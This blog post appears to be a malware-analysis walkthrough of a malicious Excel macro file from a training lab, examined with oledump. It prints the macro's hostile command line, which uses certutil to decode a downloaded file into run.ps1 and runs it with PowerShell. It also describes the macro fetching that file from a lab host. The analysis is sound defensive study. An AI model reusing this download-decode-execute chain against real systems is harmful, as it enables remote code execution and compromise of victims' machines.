top of page
Search

Malicious Excel Document - Basic Static Analysis

  • Hacking By Doing
  • Aug 8, 2024
  • 2 min read

In this post, I'll be performing a static analysis on a potentially malicious Excel document.


ree


For this analysis, I'll be using my REMnux machine.

After downloading the suspected files from the PMAT labs, I obtained an Excel file named "SheetsForFinancial.xlsm". Let’s unzip it and examine its contents.

ree

Upon inspection, we find several intriguing components, such as xl/vbaproject.bin within the xl directory.

This .bin file is noteworthy because it implies the presence of raw bytes and VBA (Visual Basic for Applications) code, which could potentially be malicious.

To extract strings from the vbaproject.bin file, we can use oledump.py. Let's run the following command: oledump.py -s 3 -S -sheetsForFinancial.xlsm

ree

As we see here, there’s a suspicious string that looks like a command:

cmd /c certutil -decode encd.crt run.ps1 & c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

To investigate further, we need to view how the VBA code is written in the macro. We can use the following command to decompress and display the VBA code: oledump.py -s 3 --vbadecompresscorrupt sheetsForFinancial.xlsm


ree

Here, we can see the full text of the macro.

The macro contains a function that constructs a string from random characters in an array.

It also creates an HTTP object, indicating an attempt to reach a web URL using HTTP requests.

The code includes several Base64 encoded strings and makes a request to a URL starting with serv3.wonderballfinancial.local, ending with a .crt file request.

The macro writes this file to encd.crt and then uses the Windows shell to execute a command via cmd.

This command decodes the .crt file using certutil, resulting in a file named run.ps1.

Finally, it invokes PowerShell to execute the run.ps1 file.


In conclusion, if this Excel document is executed, the macro will initiate and download a file from the serv3.wonderballfinancial.local link.

It will decode this file using certutil, producing a file named run.ps1. Subsequently, it will use PowerShell to execute the run.ps1 file, which is likely to be some form of payload, possibly a RAT (Remote Access Trojan).

Thank you for reading. I hope this analysis was helpful!

 
 
bottom of page